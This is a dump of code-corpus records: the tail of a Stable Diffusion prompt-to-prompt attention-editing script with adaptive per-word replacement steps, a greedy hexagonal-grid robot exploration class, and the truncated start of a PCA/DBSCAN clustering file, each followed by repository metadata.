False\nNUM_DIFFUSION_STEPS = 50\nGUIDANCE_SCALE = 7.5\nMAX_NUM_WORDS = 77\ndevice = torch.device('cuda:1') if torch.cuda.is_available() else torch.device('cpu')\n# ldm_stable = StableDiffusionPipeline.from_pretrained('CompVis/stable-diffusion-v1-4', use_auth_token=MY_TOKEN).to(device)\nldm_stable = StableDiffusionPipeline.from_pretrained('CompVis/stable-diffusion-v1-4', use_auth_token=MY_TOKEN).to(device)\ntokenizer = ldm_stable.tokenizer\n\n\nclass LocalBlend:\n \n def __call__(self, x_t, attention_store):\n k = 1\n maps = attention_store[\"down_cross\"][2:4] + attention_store[\"up_cross\"][:3]\n maps = [item.reshape(self.alpha_layers.shape[0], -1, 1, 16, 16, MAX_NUM_WORDS) for item in maps]\n maps = torch.cat(maps, dim=1)\n maps = (maps * self.alpha_layers).sum(-1).mean(1)\n mask = nnf.max_pool2d(maps, (k * 2 + 1, k * 2 +1), (1, 1), padding=(k, k))\n mask = nnf.interpolate(mask, size=(x_t.shape[2:]))\n mask = mask / mask.max(2, keepdims=True)[0].max(3, keepdims=True)[0]\n mask = mask.gt(self.threshold)\n mask = (mask[:1] + mask[1:]).float()\n x_t = x_t[:1] + mask * (x_t - x_t[:1])\n return x_t\n \n def __init__(self, prompts: List[str], words: [List[List[str]]], threshold=.3):\n alpha_layers = torch.zeros(len(prompts), 1, 1, 1, 1, MAX_NUM_WORDS)\n for i, (prompt, words_) in enumerate(zip(prompts, words)):\n if type(words_) is str:\n words_ = [words_]\n for word in words_:\n ind = ptp_utils.get_word_inds(prompt, word, tokenizer)\n alpha_layers[i, :, :, :, :, ind] = 1\n self.alpha_layers = alpha_layers.to(device)\n self.threshold = threshold\n\n\nclass AttentionControl(abc.ABC):\n \n def step_callback(self, x_t):\n return x_t\n \n def between_steps(self):\n return\n \n @property\n def num_uncond_att_layers(self):\n return self.num_att_layers if LOW_RESOURCE else 0\n \n @abc.abstractmethod\n def forward (self, attn, is_cross: bool, place_in_unet: str):\n raise NotImplementedError\n\n def __call__(self, attn, is_cross: bool, place_in_unet: str, query):\n if self.cur_att_layer >= self.num_uncond_att_layers:\n if LOW_RESOURCE:\n attn = self.forward(attn, is_cross, place_in_unet, query)\n else:\n h = attn.shape[0]\n attn[h // 2:] = self.forward(attn[h // 2:], is_cross, place_in_unet, query)\n self.cur_att_layer += 1\n if self.cur_att_layer == self.num_att_layers + self.num_uncond_att_layers:\n self.cur_att_layer = 0\n self.cur_step += 1\n self.between_steps()\n return attn\n \n def reset(self):\n self.cur_step = 0\n self.cur_att_layer = 0\n\n def __init__(self):\n self.cur_step = 0\n self.num_att_layers = -1\n self.cur_att_layer = 0\n\nclass EmptyControl(AttentionControl):\n \n def forward (self, attn, is_cross: bool, place_in_unet: str, query):\n return attn\n \n \nclass AttentionStore(AttentionControl):\n\n @staticmethod\n def get_empty_store():\n return {\"down_cross\": [], \"mid_cross\": [], \"up_cross\": [],\n \"down_self\": [], \"mid_self\": [], \"up_self\": []}\n\n def forward(self, attn, is_cross: bool, place_in_unet: str, query):\n key = f\"{place_in_unet}_{'cross' if is_cross else 'self'}\"\n if attn.shape[1] <= 32 ** 2: # avoid memory overhead\n self.step_store[key].append(attn)\n return attn\n\n def between_steps(self):\n if len(self.attention_store) == 0:\n self.attention_store = self.step_store\n else:\n for key in self.attention_store:\n for i in range(len(self.attention_store[key])):\n self.attention_store[key][i] += self.step_store[key][i]\n self.step_store = self.get_empty_store()\n\n def get_average_attention(self):\n average_attention = {key: [item / self.cur_step for item in self.attention_store[key]] for key in self.attention_store}\n return average_attention\n\n\n def reset(self):\n super(AttentionStore, self).reset()\n self.step_store = self.get_empty_store()\n self.attention_store = {}\n\n def __init__(self):\n super(AttentionStore, self).__init__()\n self.step_store = self.get_empty_store()\n self.attention_store = {}\n\n\nclass Normalize(nn.Module):\n\n def __init__(self, power=2):\n super(Normalize, self).__init__()\n self.power = power\n\n def forward(self, x):\n norm = x.pow(self.power).sum(-1, keepdim=True).pow(1. / self.power)\n out = x.div(norm+1e-7)\n return out\n \n \nclass AttentionRelation(AttentionControl):\n \n @staticmethod\n def get_empty_store():\n return {\"down_cross\": [], \"mid_cross\": [], \"up_cross\": [],\n \"down_self\": [], \"mid_self\": [], \"up_self\": []}\n\n def forward(self, attn, is_cross: bool, place_in_unet: str, query):\n # if place_in_unet == 'up' and query.shape[0] == 4096 and self.cur_step == NUM_DIFFUSION_STEPS and is_cross:\n # target_ids = tokenizer.encode(self.prompts[1])[1:-1]\n # words = ['']\n # for cur_idx in target_ids:\n # words.append(tokenizer.decode(cur_idx))\n # words.append('')\n # replaced = (self.alphas.squeeze() == 0)\n \n # attn_target = attn[attn.shape[0]//2:, :, :]\n # replaced_len = replaced.sum()\n\n # all_embed = attn_target.permute(0, 2, 1)\n # all_embed = all_embed / all_embed.sum(axis=-1, keepdims=True)\n # all_embed = torch.einsum('hwi,ic->hwc', all_embed, query)\n # all_embed = self.l2norm(all_embed)\n\n # replaced_embed = all_embed[:, replaced, :]\n # replaced_embed = replaced_embed.sum(axis=1) / replaced_len\n\n # sim = torch.einsum('hc,hwc->hw', replaced_embed, all_embed)\n # h = sim.shape[0]\n # sim = sim.sum(axis=0) / h\n # print(sim.shape) \n \n key = f\"{place_in_unet}_{'cross' if is_cross else 'self'}\"\n if attn.shape[1] <= 32 ** 2: # avoid memory overhead\n self.step_store[key].append(attn)\n\n num_pixels = 1024\n length = int(math.sqrt(num_pixels))\n if place_in_unet == 'up' and query.shape[0] == 1024 and self.cur_step == NUM_DIFFUSION_STEPS and is_cross: self.cnt += 1\n if self.cnt == 3:\n attention_maps = self.get_average_attention()\n attentions = []\n for location in ['down', 'up']:\n for item in attention_maps[f\"{location}_{'cross' if is_cross else 'self'}\"]:\n if item.shape[1] == num_pixels:\n cross_maps = item.reshape(1, -1, length, length, item.shape[-1])[0]\n attentions.append(cross_maps)\n\n attentions = torch.cat(attentions, dim=0)\n attentions = attentions.sum(axis=0) / attentions.shape[0]\n # self.visualize(attentions, 3, 'sitting.jpg')\n \n tau = 0.002\n attentions = attentions.reshape(num_pixels, -1)\n attentions[attentions < tau] = 0\n attentions = attentions / (attentions.sum(0, keepdim=True)+1e-7)\n replaced = (self.alphas.squeeze() == 0)\n # print(replaced)\n embeddings = torch.einsum('ic,iw->cw', query, attentions)\n embeddings = embeddings.permute(1, 0)\n embeddings = self.l2norm(embeddings)\n replaced_embeddings = embeddings[replaced, :]\n replaced_embeddings = replaced_embeddings.sum(axis=0) / replaced_embeddings.shape[0]\n replaced_embeddings = replaced_embeddings.unsqueeze(0)\n sim = torch.einsum('wc,sc->ws', embeddings, replaced_embeddings)\n \n target_ids = tokenizer.encode(self.prompts[1])[1:-1]\n words = []\n for cur_idx in target_ids:\n words.append(tokenizer.decode(cur_idx))\n words_sim = sim[1:len(words)+1]\n words_sim = (torch.exp(1-words_sim).squeeze() - 1)\n self.words_dict = {}\n for idx, word in enumerate(words):\n if replaced[idx]: self.words_dict[word] = 0.0\n else: self.words_dict[word] = float(words_sim[idx].data.detach().cpu())\n self.default_v = max(0.0, float(0.8 - ((words_sim < 0.1).sum() / len(words)).data.detach().cpu()))\n self.cnt = 0\n self.words_dict['default_'] = self.default_v\n return attn\n\n def get_time_res(self):\n return self.words_dict, self.default_v\n\n def visualize(self, attentions, idx, name):\n idx_attention = attentions[:, :, idx]\n idx_attention = idx_attention * 255.0 / idx_attention.max()\n idx_attention = idx_attention.unsqueeze(-1).expand(*idx_attention.shape, 3)\n idx_attention = idx_attention.cpu().numpy().astype(np.uint8)\n idx_attention = np.array(Image.fromarray(idx_attention).resize((256, 256)))\n cv2.imwrite(name, idx_attention)\n\n def between_steps(self):\n if len(self.attention_store) == 0:\n self.attention_store = self.step_store\n else:\n for key in self.attention_store:\n for i in range(len(self.attention_store[key])):\n self.attention_store[key][i] += self.step_store[key][i]\n self.step_store = self.get_empty_store()\n\n def get_average_attention(self):\n average_attention = {key: [item / self.cur_step for item in self.attention_store[key]] for key in self.attention_store}\n return average_attention\n\n\n def reset(self):\n super(AttentionRelation, self).reset()\n self.step_store = self.get_empty_store()\n self.attention_store = {}\n\n def __init__(self, prompts):\n super(AttentionRelation, self).__init__()\n self.step_store = self.get_empty_store()\n self.attention_store = {}\n self.l2norm = Normalize(2)\n self.cnt = 0\n self.prompts = prompts\n self.mapper, alphas = seq_aligner.get_refinement_mapper(prompts, tokenizer)\n self.mapper, alphas = self.mapper.to(device), alphas.to(device)\n self.alphas = alphas.reshape(alphas.shape[0], 1, 1, alphas.shape[1])\n\n \nclass AttentionControlEdit(AttentionStore, abc.ABC):\n \n def step_callback(self, x_t):\n if self.local_blend is not None:\n x_t = self.local_blend(x_t, self.attention_store)\n return x_t\n \n def replace_self_attention(self, attn_base, att_replace):\n if att_replace.shape[2] <= 16 ** 2:\n ## 等价于直接返回atte_base.unqeueeze(0),也就是和att_replace的维度一样,由[8, 256, 256]变为[1, 8, 256, 256]\n # return 0.5 * attn_base.unsqueeze(0).expand(att_replace.shape[0], *attn_base.shape) + 0.5 * att_replace\n return attn_base.unsqueeze(0).expand(att_replace.shape[0], *attn_base.shape)\n else:\n return att_replace\n \n @abc.abstractmethod\n def replace_cross_attention(self, attn_base, att_replace):\n raise NotImplementedError\n \n @abc.abstractmethod\n def mask_cross_attention(self, attn_base, att_replace):\n raise NotImplementedError\n \n def forward(self, attn, is_cross: bool, place_in_unet: str, query):\n super(AttentionControlEdit, self).forward(attn, is_cross, place_in_unet, query)\n if is_cross or (self.num_self_replace[0] <= self.cur_step < self.num_self_replace[1]):\n h = attn.shape[0] // (self.batch_size)\n attn = attn.reshape(self.batch_size, h, *attn.shape[1:])\n attn_base, attn_repalce = attn[0], attn[1:]\n if is_cross:\n alpha_words = self.cross_replace_alpha[self.cur_step]\n # attn_repalce_new = self.replace_cross_attention(attn_base, attn_repalce) * alpha_words + (1 - alpha_words) * self.mask_cross_attention(attn_base, attn_repalce, query)\n attn_repalce_new = self.replace_cross_attention(attn_base, attn_repalce) * alpha_words + (1 - alpha_words) * attn_repalce\n attn[1:] = attn_repalce_new\n else:\n attn[1:] = self.replace_self_attention(attn_base, attn_repalce)\n attn = attn.reshape(self.batch_size * h, *attn.shape[2:])\n return attn\n \n def __init__(self, prompts, num_steps: int,\n cross_replace_steps: Union[float, Tuple[float, float], Dict[str, Tuple[float, float]]],\n self_replace_steps: Union[float, Tuple[float, float]],\n local_blend: Optional[LocalBlend]):\n super(AttentionControlEdit, self).__init__()\n self.batch_size = len(prompts)\n self.cross_replace_alpha = ptp_utils.get_time_words_attention_alpha(prompts, num_steps, cross_replace_steps, tokenizer).to(device)\n if type(self_replace_steps) is float:\n self_replace_steps = 0, self_replace_steps\n self.num_self_replace = int(num_steps * self_replace_steps[0]), int(num_steps * self_replace_steps[1])\n self.local_blend = local_blend\n\nclass AttentionReplace(AttentionControlEdit):\n\n def replace_cross_attention(self, attn_base, att_replace):\n return torch.einsum('hpw,bwn->bhpn', attn_base, self.mapper)\n \n def mask_cross_attention(self, attn_base, att_replace):\n raise att_replace\n \n def __init__(self, prompts, num_steps: int, cross_replace_steps: float, self_replace_steps: float,\n local_blend: Optional[LocalBlend] = None):\n super(AttentionReplace, self).__init__(prompts, num_steps, cross_replace_steps, self_replace_steps, local_blend)\n self.mapper = seq_aligner.get_replacement_mapper(prompts, tokenizer).to(device)\n\n\ndef visualize_attn(attentions, idx, name):\n idx_attention = attentions[:, :, idx]\n idx_attention = idx_attention * 255.0 / idx_attention.max()\n idx_attention = idx_attention.unsqueeze(-1).expand(*idx_attention.shape, 3)\n idx_attention = idx_attention.cpu().numpy().astype(np.uint8)\n idx_attention = np.array(Image.fromarray(idx_attention).resize((256, 256)))\n cv2.imwrite(name, idx_attention)\n \n\nclass AttentionRefine(AttentionControlEdit):\n\n def replace_cross_attention(self, attn_base, att_replace):\n attn_base_replace = attn_base[:, :, self.mapper].permute(2, 0, 1, 3)\n attn_replace = attn_base_replace * self.alphas + att_replace * (1 - self.alphas)\n return attn_replace\n \n def mask_cross_attention(self, attn_base, att_replace, query):\n replaced_words = (self.alphas == 0).squeeze()\n replaced_words_len = replaced_words.sum()\n att_replace_words = att_replace[:, :, :, replaced_words]\n att_replace_query = att_replace_words.sum(axis=-1) / replaced_words_len\n att_replace_query = att_replace_query.squeeze()\n replace_query = torch.mm(att_replace_query, query)\n # 控制这里attention过softmax的温度\n tau = 0.01\n att_replace_img = torch.einsum('hc,ic->hi', replace_query, query) / tau\n att_replace_img = att_replace_img.softmax(dim=-1).unsqueeze(-1).repeat(1, 1, att_replace.shape[2])\n\n att_combination = torch.einsum('hcw,hcw->hcw', att_replace_img, att_replace.squeeze()) + torch.einsum('hcw,hcw->hcw',(1-att_replace_img), attn_base.squeeze())\n return att_combination.unsqueeze(0)\n\n def __init__(self, prompts, num_steps: int, cross_replace_steps: float, self_replace_steps: float,\n local_blend: Optional[LocalBlend] = None):\n super(AttentionRefine, self).__init__(prompts, num_steps, cross_replace_steps, self_replace_steps, local_blend)\n self.mapper, alphas = seq_aligner.get_refinement_mapper(prompts, tokenizer)\n self.mapper, alphas = self.mapper.to(device), alphas.to(device)\n self.alphas = alphas.reshape(alphas.shape[0], 1, 1, alphas.shape[1])\n\n\nclass AttentionReweight(AttentionControlEdit):\n\n def replace_cross_attention(self, attn_base, att_replace):\n if self.prev_controller is not None:\n attn_base = self.prev_controller.replace_cross_attention(attn_base, att_replace)\n attn_replace = attn_base[None, :, :, :] * self.equalizer[:, None, None, :]\n return attn_replace\n \n def mask_cross_attention(self, attn_base, att_replace):\n raise att_replace\n\n def __init__(self, prompts, num_steps: int, cross_replace_steps: float, self_replace_steps: float, equalizer,\n local_blend: Optional[LocalBlend] = None, controller: Optional[AttentionControlEdit] = None):\n super(AttentionReweight, self).__init__(prompts, num_steps, cross_replace_steps, self_replace_steps, local_blend)\n self.equalizer = equalizer.to(device)\n self.prev_controller = controller\n\n\ndef get_equalizer(text: str, word_select: Union[int, Tuple[int, ...]], values: Union[List[float],\n Tuple[float, ...]]):\n if type(word_select) is int or type(word_select) is str:\n word_select = (word_select,)\n equalizer = torch.ones(len(values), 77)\n values = torch.tensor(values, dtype=torch.float32)\n for word in word_select:\n inds = ptp_utils.get_word_inds(text, word, tokenizer)\n equalizer[:, inds] = values\n return equalizer\n\n\nfrom PIL import Image\n\ndef aggregate_attention(attention_store: AttentionStore, res: int, from_where: List[str], is_cross: bool, select: int):\n out = []\n attention_maps = attention_store.get_average_attention()\n num_pixels = res ** 2\n for location in from_where:\n for item in attention_maps[f\"{location}_{'cross' if is_cross else 'self'}\"]:\n if item.shape[1] == num_pixels:\n cross_maps = item.reshape(len(prompts), -1, res, res, item.shape[-1])[select]\n out.append(cross_maps)\n out = torch.cat(out, dim=0)\n out = out.sum(0) / out.shape[0]\n return out.cpu()\n\n\ndef save_images(targrt_dir, image_array, new_attention=False):\n if not os.path.exists(targrt_dir): os.mkdir(targrt_dir)\n for idx, cur_img in enumerate(image_array):\n if new_attention: img_path = os.path.join(targrt_dir, str(idx)+'_new'+'.jpg')\n else: img_path = os.path.join(targrt_dir, str(idx)+'.jpg')\n cur_img = cv2.cvtColor(cur_img, cv2.COLOR_RGB2BGR)\n cv2.imwrite(img_path, cur_img)\n\n\ndef show_cross_attention(attention_store: AttentionStore, res: int, from_where: List[str], select: int = 0):\n tokens = tokenizer.encode(prompts[select])\n decoder = tokenizer.decode\n attention_maps = aggregate_attention(attention_store, res, from_where, True, select)\n images = []\n for i in range(len(tokens)):\n image = attention_maps[:, :, i]\n image = 255 * image / image.max()\n image = image.unsqueeze(-1).expand(*image.shape, 3)\n image = image.numpy().astype(np.uint8)\n image = np.array(Image.fromarray(image).resize((256, 256)))\n image = ptp_utils.text_under_image(image, decoder(int(tokens[i])))\n images.append(image)\n save_images('./cross_attention', images)\n # ptp_utils.view_images(np.stack(images, axis=0))\n \n\ndef show_self_attention_comp(attention_store: AttentionStore, res: int, from_where: List[str],\n max_com=10, select: int = 0):\n attention_maps = aggregate_attention(attention_store, res, from_where, False, select).numpy().reshape((res ** 2, res ** 2))\n u, s, vh = np.linalg.svd(attention_maps - np.mean(attention_maps, axis=1, keepdims=True))\n images = []\n for i in range(max_com):\n image = vh[i].reshape(res, res)\n image = image - image.min()\n image = 255 * image / image.max()\n image = np.repeat(np.expand_dims(image, axis=2), 3, axis=2).astype(np.uint8)\n image = Image.fromarray(image).resize((256, 256))\n image = np.array(image)\n images.append(image)\n save_images('./self_attention_comp', images)\n # ptp_utils.view_images(np.concatenate(images, axis=1))\n \n \ndef run_and_display(prompts, controller, latent=None, run_baseline=False, generator=None):\n if run_baseline:\n print(\"w.o. prompt-to-prompt\")\n images, latent = run_and_display(prompts, EmptyControl(), latent=latent, run_baseline=False, generator=generator)\n print(\"with prompt-to-prompt\")\n images, x_t = ptp_utils.text2image_ldm_stable(ldm_stable, prompts, controller, latent=latent, num_inference_steps=NUM_DIFFUSION_STEPS,\n guidance_scale=GUIDANCE_SCALE, generator=generator, low_resource=LOW_RESOURCE)\n save_images('./display', images)\n # ptp_utils.view_images(images)\n return images, x_t\n\n\n# g_cpu = torch.Generator().manual_seed(666)\n# prompts = [\"A dog standing on the grass\"]\n# controller = AttentionStore()\n# image, x_t = run_and_display(prompts, controller, latent=None, run_baseline=False, generator=g_cpu)\n# show_cross_attention(controller, res=16, from_where=(\"up\", \"down\"))\n\n\n@torch.no_grad()\ndef image2latent(image):\n DEVICE = torch.device(\"cuda\") if torch.cuda.is_available() else torch.device(\"cpu\")\n if type(image) is Image:\n image = np.array(image)\n else: image = np.squeeze(image, axis=0)\n image = torch.from_numpy(image).float() / 127.5 - 1\n image = image.permute(2, 0, 1).unsqueeze(0).to(DEVICE)\n # input image density range [-1, 1]\n latents = ldm_stable.vae.encode(image)['latent_dist'].mean\n latents = latents * 0.18215\n return latents\n\n\ndef get_cross_attention(prompt, attention_store: AttentionStore, res: int, from_where: List[str], select: int = 0, new_attention=False):\n tokens = tokenizer.encode(prompt)\n decoder = tokenizer.decode\n attention_maps = aggregate_attention(attention_store, res, from_where, True, select)\n images = []\n for i in range(len(tokens)):\n image = attention_maps[:, :, i]\n image = 255 * image / image.max()\n image = image.unsqueeze(-1).expand(*image.shape, 3)\n image = image.numpy().astype(np.uint8)\n image = np.array(Image.fromarray(image).resize((256, 256)))\n image = ptp_utils.text_under_image(image, decoder(int(tokens[i])))\n images.append(image)\n save_images('./cross_attention', images, new_attention)\n return images[1:len(images)-1]\n\n\ndef get_attention_map(prompt, latent=None, generator=None, new_attention=False):\n controller = AttentionStore()\n image, x_t = run_and_display([prompt], controller, latent=latent, run_baseline=False, generator=generator)\n return get_cross_attention(prompt, controller, res=16, from_where=(\"up\", \"down\"), new_attention=new_attention), x_t, image\n\n\ndef calculate_steps_dict(cross_attention1, cross_attention2, prompts):\n words_1, words_2 = prompts[0].split(), prompts[1].split()\n mapper, alphas = seq_aligner.get_refinement_mapper(prompts, tokenizer)\n valuable_mapper = mapper[0][1:len(words_2)+1]\n is_replace = (valuable_mapper == -1)\n if is_replace.sum() + len(words_1) < len(words_2):\n is_replace[len(words_1)+is_replace.sum():len(words_2)] = True\n\n padding = np.zeros_like(cross_attention2[0])\n dis = [0] * len(words_2)\n h, w, z = cross_attention1[0].shape\n for i in range(len(words_2)):\n if is_replace[i]:\n dis[i] = np.abs(cross_attention2[i]-padding).sum() / (h*w*z)\n else:\n dis[i] = np.abs(cross_attention2[i]-cross_attention1[valuable_mapper[i]-1]).sum() / (h*w*z)\n \n words_steps_dict = {}\n dis_anchor = 0\n for i in range(len(words_2)):\n if is_replace[i]: dis_anchor = max(dis_anchor, dis[i])\n dis_anchor = min(dis_anchor*1.5, 255)\n \n # 记录超过阈值的attention_map数量\n cnt_thres = 0\n for i in range(len(words_2)):\n if is_replace[i]:\n cur_weight = 0\n else:\n cur_weight = 0.8 - dis[i] / dis_anchor \n cur_weight = max(cur_weight, 0)\n if cur_weight < 0.1: cnt_thres += 1\n words_steps_dict[words_2[i]] = float(cur_weight)\n default_steps = max(0.0, float(0.4 * (1 - cnt_thres/len(words_2) - is_replace.sum()/len(words_2))))\n words_steps_dict['default_'] = default_steps\n return words_steps_dict, default_steps\n\n\ndef adaptive_calculate_steps(prompts, g_cpu):\n cross_attention1, x_t, image1 = get_attention_map(prompts[0], generator=g_cpu)\n # latent1 = image2latent(image1)\n # latent1 = x_t[-1:, :, :, :]\n cross_attention2, _, _ = get_attention_map(prompts[1], latent=x_t, new_attention=True)\n # cross_attention2, _, _ = get_attention_map(prompts[1], latent=x_t)\n words_steps_dict, default_step = calculate_steps_dict(cross_attention1, cross_attention2, prompts)\n return words_steps_dict, default_step\n\nrandom_seed = 888\ng_cpu = torch.Generator().manual_seed(random_seed)\n\n\nprompts = [\n \"A man standing on the grass\",\n \"A man sitting on the grass , holding a cup\"\n]\n\n# prompts = [\n# \"a slim girl sitting on the bench\",\n# \"a fat girl sitting on the bench\"\n# ]\n\n# prompts = [\n# \"a boy on the road\",\n# \"a boy sitting on the road\"\n# ]\n\n# prompts = [\n# \"A bucket full with apples is lying on the table\",\n# \"A bucket a few with apples is lying on the table\"\n# ]\n\n# prompts = [\n# \"A dog standing on the grass\",\n# \"A dog sitting on the grass\"\n# ]\n\n# prompts = [\n# \"A boy with black hair\",\n# \"A boy with yellow hair\"\n# ]\n\n# words_steps_dict, default_step = adaptive_calculate_steps(prompts, g_cpu)\n\ncontroller_ini = AttentionRelation(prompts)\n_ = run_and_display([prompts[1]], controller_ini, latent=None, generator=torch.Generator().manual_seed(random_seed))\nwords_steps_dict, default_step = controller_ini.get_time_res()\n\n\nprint(words_steps_dict)\ncontroller = AttentionRefine(prompts, NUM_DIFFUSION_STEPS,\n cross_replace_steps=words_steps_dict, \n self_replace_steps=default_step)\n_ = run_and_display(prompts, controller, latent=None, generator=torch.Generator().manual_seed(random_seed))\n\n\n# # %%\n# prompts = [\"a photo of a house on a mountain\",\n# \"a photo of a house on a mountain at fall\"]\n\n\n# controller = AttentionRefine(prompts, NUM_DIFFUSION_STEPS, cross_replace_steps=.8,\n# self_replace_steps=.4)\n# _ = run_and_display(prompts, controller, latent=None, generator=torch.Generator().manual_seed(random_seed))\n\n\n# # %%\n# prompts = [\"a photo of a house on a mountain\",\n# \"a photo of a house on a mountain at winter\"]\n\n\n# controller = AttentionRefine(prompts, NUM_DIFFUSION_STEPS, cross_replace_steps=.8,\n# self_replace_steps=.4)\n# _ = run_and_display(prompts, controller, latent=x_t)\n\n\n# # %%\n# prompts = [\"soup\",\n# \"pea soup\"] \n\n# lb = LocalBlend(prompts, (\"soup\", \"soup\"))\n\n# controller = AttentionRefine(prompts, NUM_DIFFUSION_STEPS, cross_replace_steps=.8,\n# self_replace_steps=.4,\n# local_blend=lb)\n# _ = run_and_display(prompts, controller, latent=x_t, run_baseline=False)\n\n\n# # %%\n# prompts = [\"a smiling bunny doll\"] * 2\n\n# ### pay 3 times more attention to the word \"smiling\"\n# equalizer = get_equalizer(prompts[1], (\"smiling\",), (5,))\n# controller = AttentionReweight(prompts, NUM_DIFFUSION_STEPS, cross_replace_steps=.8,\n# self_replace_steps=.4,\n# equalizer=equalizer)\n# _ = run_and_display(prompts, controller, latent=x_t, run_baseline=False)\n\n\n# # %%\n# prompts = [\"pink bear riding a bicycle\"] * 2\n\n# ### we don't wont pink bikes, only pink bear.\n# ### we reduce the amount of pink but apply it locally on the bikes (attention re-weight + local mask )\n\n# ### pay less attention to the word \"pink\"\n# equalizer = get_equalizer(prompts[1], (\"pink\",), (-1,))\n\n# ### apply the edit on the bikes \n# lb = LocalBlend(prompts, (\"bicycle\", \"bicycle\"))\n# controller = AttentionReweight(prompts, NUM_DIFFUSION_STEPS, cross_replace_steps=.8,\n# self_replace_steps=.4,\n# equalizer=equalizer,\n# local_blend=lb)\n# _ = run_and_display(prompts, controller, latent=x_t, run_baseline=False)\n\n\n# # %%\n# prompts = [\"soup\",\n# \"pea soup with croutons\"] \n# lb = LocalBlend(prompts, (\"soup\", \"soup\"))\n# controller = AttentionRefine(prompts, NUM_DIFFUSION_STEPS, cross_replace_steps=.8,\n# self_replace_steps=.4, local_blend=lb)\n# _ = run_and_display(prompts, controller, latent=x_t, run_baseline=False)\n\n\n# # %%\n# prompts = [\"soup\",\n# \"pea soup with croutons\"] \n\n\n# lb = LocalBlend(prompts, (\"soup\", \"soup\"))\n# controller_a = AttentionRefine(prompts, NUM_DIFFUSION_STEPS, cross_replace_steps=.8, \n# self_replace_steps=.4, local_blend=lb)\n\n# ### pay 3 times more attention to the word \"croutons\"\n# equalizer = get_equalizer(prompts[1], (\"croutons\",), (3,))\n# controller = AttentionReweight(prompts, NUM_DIFFUSION_STEPS, cross_replace_steps=.8,\n# self_replace_steps=.4, equalizer=equalizer, local_blend=lb,\n# controller=controller_a)\n# _ = run_and_display(prompts, controller, latent=x_t, run_baseline=False)\n\n\n# # %%\n# prompts = [\"potatos\",\n# \"fried potatos\"] \n# lb = LocalBlend(prompts, (\"potatos\", \"potatos\"))\n# controller = AttentionRefine(prompts, NUM_DIFFUSION_STEPS, cross_replace_steps=.8,\n# self_replace_steps=.4, local_blend=lb)\n# _ = run_and_display(prompts, controller, latent=x_t, run_baseline=False)\n\n\n# # %%\n# prompts = [\"potatos\",\n# \"fried potatos\"] \n# lb = LocalBlend(prompts, (\"potatos\", \"potatos\"))\n# controller = AttentionRefine(prompts, NUM_DIFFUSION_STEPS, cross_replace_steps=.8, \n# self_replace_steps=.4, local_blend=lb)\n\n# ### pay 10 times more attention to the word \"fried\"\n# equalizer = get_equalizer(prompts[1], (\"fried\",), (10,))\n# controller = AttentionReweight(prompts, NUM_DIFFUSION_STEPS, cross_replace_steps=.8,\n# self_replace_steps=.4, equalizer=equalizer, local_blend=lb,\n# controller=controller_a)\n# _ = run_and_display(prompts, controller, latent=x_t, run_baseline=False)\n","repo_name":"AnonymousPony/adap-edit","sub_path":"prompt-to-prompt_stable.py","file_name":"prompt-to-prompt_stable.py","file_ext":"py","file_size_in_byte":30841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73162444005","text":"from decentralized_exploration.core.robots.AbstractRobot import AbstractRobot\nfrom decentralized_exploration.core.constants import Actions\nfrom decentralized_exploration.helpers.decision_making import find_new_orientation, get_new_state, closest_reward\nfrom decentralized_exploration.helpers.hex_grid import Hex, merge_map\n\n\nclass RobotGreedy(AbstractRobot):\n def __init__(self, robot_id, range_finder, width, length, world_size):\n super(RobotGreedy, self).__init__(robot_id, range_finder, width, length, world_size)\n\n\n # Private Methods\n def _choose_next_pose(self, current_position, current_orientation, iteration):\n \"\"\"\n Given the current pos, decides on the next best position for the robot\n\n Parameters\n ----------\n current_position (tuple): tuple of integer pixel coordinates\n current_orientation (int): int representing current orientation of robot\n iteration (int): the current iteration of the algorithm\n\n Returns\n -------\n next_state (tuple): tuple of q and r coordinates of the new position, with orientation at the end\n \"\"\"\n\n current_hex_pos = self.hex_map.hex_at(point=current_position)\n current_hex = self.hex_map.find_hex(desired_hex=current_hex_pos)\n current_state = (current_hex.q, current_hex.r, current_orientation)\n \n # Checking if on reward hexagon\n on_reward_hex = current_hex.reward > 0\n \n if on_reward_hex and not self._escaping_dead_reward['escaping_dead_reward']: \n next_hex = self.hex_map.find_closest_unknown(center_hex=current_hex)\n is_clockwise, new_orientation = find_new_orientation(current_hex=current_hex, current_orientation=current_orientation, next_hex=next_hex)\n\n if new_orientation == current_orientation:\n if next_hex.state == 0:\n action = Actions.FORWARD\n next_state = get_new_state(current_state, action)\n return next_state\n else:\n self._escaping_dead_reward['escaping_dead_reward'] = True \n else:\n if self._escaping_dead_reward['was_just_on_reward'] == True and new_orientation == self._escaping_dead_reward['previous_orientation']:\n self._escaping_dead_reward['escaping_dead_reward'] = True \n else:\n self._escaping_dead_reward['was_just_on_reward'] = True\n self._escaping_dead_reward['previous_orientation'] = current_orientation\n action = Actions.CLOCKWISE if is_clockwise else Actions.COUNTER_CLOCKWISE\n next_state = get_new_state(current_state, action)\n return next_state\n \n self._escaping_dead_reward['was_just_on_reward'] = False\n next_position = closest_reward(current_hex, self.hex_map)[0]\n\n # All rewards have been found\n if next_position == None:\n return current_state\n\n next_hex = Hex(next_position[0], next_position[1])\n is_clockwise, new_orientation = find_new_orientation(current_hex=current_hex, current_orientation=current_orientation, next_hex=next_hex)\n\n if new_orientation == current_orientation:\n action = Actions.FORWARD\n self._escaping_dead_reward['escaping_dead_reward'] = False\n else:\n action = Actions.CLOCKWISE if is_clockwise else Actions.COUNTER_CLOCKWISE\n next_state = get_new_state(current_state, action)\n\n return next_state\n \n\n # Public Methods\n def communicate(self, message, iteration):\n \"\"\"\n Does nothing other than initialize the self._known_robots dictionary with itself.\n\n Parameters\n ----------\n message (dict): a dictionary containing the robot position and pixel map of the other robots\n iteration (int): the current iteration\n \"\"\"\n\n for robot_id in message:\n self.__pixel_map = merge_map(hex_map=self.hex_map, pixel_map=self.pixel_map, pixel_map_to_merge=message[robot_id]['pixel_map'])\n self.hex_map.propagate_rewards()\n\n self._known_robots[self.robot_id] = {\n 'last_updated': iteration,\n }","repo_name":"Federico-PizarroBejarano/Decentralized-Multi-Robot-Exploration","sub_path":"decentralized_exploration/core/robots/RobotGreedy.py","file_name":"RobotGreedy.py","file_ext":"py","file_size_in_byte":4260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20423438925","text":"import numpy as np\nfrom sklearn.decomposition import PCA\nfrom sklearn.cluster import DBSCAN\nimport plotly.graph_objects as go\n\n\ndef manifold_learning_principle_component(data):\n '''\n Note! The axis are not 